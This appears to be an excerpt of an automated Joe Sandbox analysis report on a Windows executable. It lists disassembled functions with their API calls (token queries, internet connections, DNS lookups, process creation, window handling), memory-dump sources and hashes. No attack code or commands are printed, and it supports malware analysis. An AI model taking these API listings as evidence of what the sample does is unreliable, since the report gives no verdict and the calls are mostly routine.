DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00FCB9AB,?,?,?), ref: 0101C56E

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: Cursor$LongMenuPopupProcTrackWindow
String ID:
API String ID: 2864067406-0
Opcode ID: 38bfa3abdc7c0c6518e8cf2f3592c6cf3df03b7e5fb3e88d45d74d53eb22cf3e
Instruction ID: 09d38ca825532034a9573d4bd33cb58403bea775607fe7959311417d76d9e861
Opcode Fuzzy Hash: 38bfa3abdc7c0c6518e8cf2f3592c6cf3df03b7e5fb3e88d45d74d53eb22cf3e
Instruction Fuzzy Hash: 8431C135600018AFEB65CF58D858EBA7FF6EB09310F044099FA858B255CB399990DBA4

Function 00FE8656 Relevance: 6.1, APIs: 4, Instructions: 79memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00FE810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00FE8121
Part of subcall function 00FE810A: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00FE812B
Part of subcall function 00FE810A: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00FE813A
Part of subcall function 00FE810A: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00FE8141
Part of subcall function 00FE810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00FE8157

LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00FE86A3
_memcmp.LIBCMT ref: 00FE86C6
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00FE86FC
HeapFree.KERNEL32(00000000), ref: 00FE8703

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
String ID:
API String ID: 1592001646-0
Opcode ID: e5ac14ef87d35300de55fa5a224e8d65581f8a67de4b77ba6f550a22b285d660
Instruction ID: 21df9143b253df7a79aebab61d2879bf97df8b67bd1fb0e40f14883776b5ab4f
Opcode Fuzzy Hash: e5ac14ef87d35300de55fa5a224e8d65581f8a67de4b77ba6f550a22b285d660
Instruction Fuzzy Hash: EE21D331E40149EFDB10EFA5C948BEEB7B8FF41358F144059E448A7240DB35AE06DB50

Function 00FB098C Relevance: 6.1, APIs: 4, Instructions: 79COMMON

Download Yara Rule

APIs

__setmode.LIBCMT ref: 00FB09AE

Part of subcall function 00F95A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00FF7896,?,?,00000000), ref: 00F95A2C
Part of subcall function 00F95A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00FF7896,?,?,00000000,?,?), ref: 00F95A50

_fprintf.LIBCMT ref: 00FB09E5
OutputDebugStringW.KERNEL32(?), ref: 00FE5DBB

Part of subcall function 00FB4AAA: _flsall.LIBCMT ref: 00FB4AC3

__setmode.LIBCMT ref: 00FB0A1A

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
String ID:
API String ID: 521402451-0
Opcode ID: 4fd56dd001f293fcebbc66105ad9ef0fac0625f2e2b2c94722fd44a46d8d1f8a
Instruction ID: e415239d1cfc5b45c8120f28df937cb0077dbf79edeaca1dec3021340bec65d1
Opcode Fuzzy Hash: 4fd56dd001f293fcebbc66105ad9ef0fac0625f2e2b2c94722fd44a46d8d1f8a
Instruction Fuzzy Hash: 54113A329086046FDB14B6BADC479FEB76C9F41320F140159F10457183EE7C6846BBA4

Function 01001767 Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 010017A3

Part of subcall function 0100182D: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0100184C
Part of subcall function 0100182D: InternetCloseHandle.WININET(00000000), ref: 010018E9

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: Internet$CloseConnectHandleOpen
String ID:
API String ID: 1463438336-0
Opcode ID: ecde88faccdf6603e603151e33ec1a363c6389e7983834780d7a1bb99665c3bd
Instruction ID: 0c0b86ec2b0e3274a0e9e449a55707d25cc068a55a638816c821b4a2be279b0c
Opcode Fuzzy Hash: ecde88faccdf6603e603151e33ec1a363c6389e7983834780d7a1bb99665c3bd
Instruction Fuzzy Hash: E3219F31200606BFFB239F649C04FBABBE9FF48B10F14401AFA9596690DB75D61597A0

Function 00FF3A2A Relevance: 6.1, APIs: 4, Instructions: 78COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(?,0101FAC0), ref: 00FF3A64
GetLastError.KERNEL32 ref: 00FF3A73
CreateDirectoryW.KERNEL32(?,00000000), ref: 00FF3A82
CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,0101FAC0), ref: 00FF3ADF

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: CreateDirectory$AttributesErrorFileLast
String ID:
API String ID: 2267087916-0
Opcode ID: c8db5bae191a20e8adc293e1125c67b5eb1e98c78f6d524eb5f87a2ef58f1245
Instruction ID: 857066fdd47e5dfcc9be4de75351e3f24d56ad068a2923a1d9600f6c3a0f65ae
Opcode Fuzzy Hash: c8db5bae191a20e8adc293e1125c67b5eb1e98c78f6d524eb5f87a2ef58f1245
Instruction Fuzzy Hash: 5C21D3795083068F8710EF39C8818BAB7E4AF55364F104A1DF5D9C72A1DB39DE49DB42

Function 01015D11 Relevance: 6.1, APIs: 4, Instructions: 69COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EC), ref: 01015D80
SetWindowLongW.USER32(?,000000EC,00000000), ref: 01015D9A
SetWindowLongW.USER32(?,000000EC,00000000), ref: 01015DA8
SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 01015DB6

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: Window$Long$AttributesLayered
String ID:
API String ID: 2169480361-0
Opcode ID: dc1e2c0e0f21d889b69a88e720300bc4d36f562cc7e11c3619d845b7649fb2df
Instruction ID: de2b2b263c8c4b28072ef4cf58e8290374032d7ef52ea2228adc4613c36f5312
Opcode Fuzzy Hash: dc1e2c0e0f21d889b69a88e720300bc4d36f562cc7e11c3619d845b7649fb2df
Instruction Fuzzy Hash: 2B11B431305511AFEB14AF18DC09FAA77A9EFC6320F444218F956CB2E1C76DAD01C754

Function 00FEDCBE Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00FEF0BC: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00FEDCD3,?,?,?,00FEEAC6,00000000,000000EF,00000119,?,?), ref: 00FEF0CB
Part of subcall function 00FEF0BC: lstrcpyW.KERNEL32(00000000,?,?,00FEDCD3,?,?,?,00FEEAC6,00000000,000000EF,00000119,?,?,00000000), ref: 00FEF0F1
Part of subcall function 00FEF0BC: lstrcmpiW.KERNEL32(00000000,?,00FEDCD3,?,?,?,00FEEAC6,00000000,000000EF,00000119,?,?), ref: 00FEF122

lstrlenW.KERNEL32(?,00000002,?,?,?,?,00FEEAC6,00000000,000000EF,00000119,?,?,00000000), ref: 00FEDCEC
lstrcpyW.KERNEL32(00000000,?,?,00FEEAC6,00000000,000000EF,00000119,?,?,00000000), ref: 00FEDD12
lstrcmpiW.KERNEL32(00000002,cdecl,?,00FEEAC6,00000000,000000EF,00000119,?,?,00000000), ref: 00FEDD46

Strings

cdecl, xrefs: 00FEDD3D

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: lstrcmpilstrcpylstrlen
String ID: cdecl
API String ID: 4031866154-3896280584
Opcode ID: 1925e11d460b0aa95357760ac43266417aee729e743e1681f4fbaf6ed8835ab8
Instruction ID: daa66adabc60df4b1c13dd663c88f33a5ce5727e57190aa5bb7d29e084763f2f
Opcode Fuzzy Hash: 1925e11d460b0aa95357760ac43266417aee729e743e1681f4fbaf6ed8835ab8
Instruction Fuzzy Hash: 9611D03A200345EFCB35AF35CC45DBA77A8FF45360B40802AF906CB290EB759850E790

Function 00FC50E2 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00FC5101

Part of subcall function 00FB571C: __FF_MSGBANNER.LIBCMT ref: 00FB5733
Part of subcall function 00FB571C: __NMSG_WRITE.LIBCMT ref: 00FB573A
Part of subcall function 00FB571C: RtlAllocateHeap.NTDLL(00A90000,00000000,00000001,00000000,?,?,?,00FB0DD3,?), ref: 00FB575F

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: 8676ecfbd68118aea27a595f428b333a114390c4eb1728ee456ef76bb3fea1ec
Instruction ID: d90ca5875a07e4c11f48508b0aff854c458ff228c5f60b10684979953cdc6ef5
Opcode Fuzzy Hash: 8676ecfbd68118aea27a595f428b333a114390c4eb1728ee456ef76bb3fea1ec
Instruction Fuzzy Hash: EA11E772D00A17AECB313F71AD0AF9E3B985B847B1B14452DF9449A151DE3DD881BB90

Function 01006369 Relevance: 6.1, APIs: 4, Instructions: 61networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00F95A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00FF7896,?,?,00000000), ref: 00F95A2C
Part of subcall function 00F95A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00FF7896,?,?,00000000,?,?), ref: 00F95A50

gethostbyname.WSOCK32(?,?,?), ref: 01006399
WSAGetLastError.WSOCK32(00000000), ref: 010063A4
_memmove.LIBCMT ref: 010063D1
inet_ntoa.WSOCK32(?), ref: 010063DC

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
String ID:
API String ID: 1504782959-0
Opcode ID: c3ae1c2117cca9170782562baf1de308e7f03e6d40d2ff32555085d784d1789d
Instruction ID: b9abd7f19f769fc0a73ab7549b53a965f7017a09eca8e27184c63bf913d7b3b4
Opcode Fuzzy Hash: c3ae1c2117cca9170782562baf1de308e7f03e6d40d2ff32555085d784d1789d
Instruction Fuzzy Hash: C3115E3150010AAFDF01FBA8DD46DEEB7B9AF04320B044069F545A71A1DB39EE18DB61

Function 00FE8B41 Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 00FE8B61
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00FE8B73
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00FE8B89
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00FE8BA4

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 3f76093d3537c3872510d046ba54318bb091975ace9af1d189bda7c1da4e6f3f
Instruction ID: b3bfea0fc8cdeeba4e38bb657b688cf6c72687d60318c68279f29c3a848ef4b3
Opcode Fuzzy Hash: 3f76093d3537c3872510d046ba54318bb091975ace9af1d189bda7c1da4e6f3f
Instruction Fuzzy Hash: C7110A79901218BFDB11DFA5C885F9DBB74FB48750F204095E904B7250DA716E11EB94

Function 00F91290 Relevance: 6.1, APIs: 4, Instructions: 59COMMON

Download Yara Rule

APIs

Part of subcall function 00F92612: GetWindowLongW.USER32(?,000000EB), ref: 00F92623

DefDlgProcW.USER32(?,00000020,?), ref: 00F912D8
GetClientRect.USER32(?,?), ref: 00FCB5FB
GetCursorPos.USER32(?), ref: 00FCB605
ScreenToClient.USER32(?,?), ref: 00FCB610

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: Client$CursorLongProcRectScreenWindow
String ID:
API String ID: 4127811313-0
Opcode ID: 72cf4370af7204a321203e32c7bc76ee36fcf4ebb6118b6f8cca816659a82d6e
Instruction ID: 6b11d9bcfba1e56e354e9c107bb0216d322958514b0deca8737c0fb3674efc12
Opcode Fuzzy Hash: 72cf4370af7204a321203e32c7bc76ee36fcf4ebb6118b6f8cca816659a82d6e
Instruction Fuzzy Hash: BE113A39A0001AEFDF10EFA8D9859FE77B8FB05301F4004A5FA41E7140C739BA55ABA5

Function 00FF1142 Relevance: 6.1, APIs: 4, Instructions: 51sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00FEFCED,?,00FF0D40,?,00008000), ref: 00FF115F
Sleep.KERNEL32(00000000,?,?,?,?,?,?,00FEFCED,?,00FF0D40,?,00008000), ref: 00FF1184
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00FEFCED,?,00FF0D40,?,00008000), ref: 00FF118E
Sleep.KERNEL32(?,?,?,?,?,?,?,00FEFCED,?,00FF0D40,?,00008000), ref: 00FF11C1

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: CounterPerformanceQuerySleep
String ID:
API String ID: 2875609808-0
Opcode ID: 45e40e2caff4e6018d1fdb1d8e6a09d381e486d1c3d17aaddac804f3d0ddc67c
Instruction ID: c487adc6fda13b8a3858193f67e795b6abd8a2ab7727ec90612bd0eaf7785113
Opcode Fuzzy Hash: 45e40e2caff4e6018d1fdb1d8e6a09d381e486d1c3d17aaddac804f3d0ddc67c
Instruction Fuzzy Hash: 55115A32C0091DD7CF109FA5D888AFEBB78FF09711F104045EB80B2240CB359554DB95

Function 00FED831 Relevance: 6.0, APIs: 4, Instructions: 50registryCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 00FED84D
LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00FED864
RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 00FED879
RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 00FED897

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: Type$Register$FileLoadModuleNameUser
String ID:
API String ID: 1352324309-0
Opcode ID: 639289d42e19fbcc20e70b1060770e9b1a59f57d235002a3309df9004106d13d
Instruction ID: e60b86bef02ea8af00417c6b2ec7227d2b409b4708b6eb98207dde3a9823df32
Opcode Fuzzy Hash: 639289d42e19fbcc20e70b1060770e9b1a59f57d235002a3309df9004106d13d
Instruction Fuzzy Hash: B711A575601305DBE320CF51DC08F92BBBCEB00700F104559A555C6440D7B5E608ABA2

Function 00FC6FB7 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 00FC6FDB

Part of subcall function 00FC76C2: __fltout2.LIBCMT ref: 00FC76EB

__cftog_l.LIBCMT ref: 00FC7001
__cftoe_l.LIBCMT ref: 00FC7033

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction ID: 67debf9437bcb7d8252d7ee5fd7f149a6594911ba55689fe540b01d1564b2d8f
Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction Fuzzy Hash: BD014E7248824ABBCF166E85CD02DED3F62BB18390B588419FA1858031D736D9B1BF81

Function 0101B2C5 Relevance: 6.0, APIs: 4, Instructions: 47COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 0101B2E4
ScreenToClient.USER32(?,?), ref: 0101B2FC
ScreenToClient.USER32(?,?), ref: 0101B320
InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0101B33B

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: ClientRectScreen$InvalidateWindow
String ID:
API String ID: 357397906-0
Opcode ID: bfa660d3b8a0a3b493c4b15300153fef7d09f9f9537207363a877adfcb876592
Instruction ID: fa8967875462edeae5b5bfdfa1f1581fc340fa8bd1446a68e1cb0fb98c7bbb59
Opcode Fuzzy Hash: bfa660d3b8a0a3b493c4b15300153fef7d09f9f9537207363a877adfcb876592
Instruction Fuzzy Hash: 4C1144B9D0020AEFDB51DFA9C4849EEBBF9FF08210F108156E954E3214D735AA658F50

Function 0101B635 Relevance: 6.0, APIs: 4, Instructions: 40processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0101B644
_memset.LIBCMT ref: 0101B653
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,01056F20,01056F64), ref: 0101B682
CloseHandle.KERNEL32 ref: 0101B694

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: _memset$CloseCreateHandleProcess
String ID:
API String ID: 3277943733-0
Opcode ID: 41d1fc146e4567a88173a233285f07a0c7539f08bd543445f11f7a7e7e47bd44
Instruction ID: deca2bc4588d20c7f9c9425fcc0253ae2fedbff43ba9eeb6460b8af84bb26218
Opcode Fuzzy Hash: 41d1fc146e4567a88173a233285f07a0c7539f08bd543445f11f7a7e7e47bd44
Instruction Fuzzy Hash: 29F082B29403007FF7602765AC06FBB3A9CEB08395FC04420FA89E5186D77F4C008BA8

Function 00FF6BDA Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 00FF6BE6

Part of subcall function 00FF76C4: _memset.LIBCMT ref: 00FF76F9

_memmove.LIBCMT ref: 00FF6C09
_memset.LIBCMT ref: 00FF6C16
LeaveCriticalSection.KERNEL32(?), ref: 00FF6C26

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

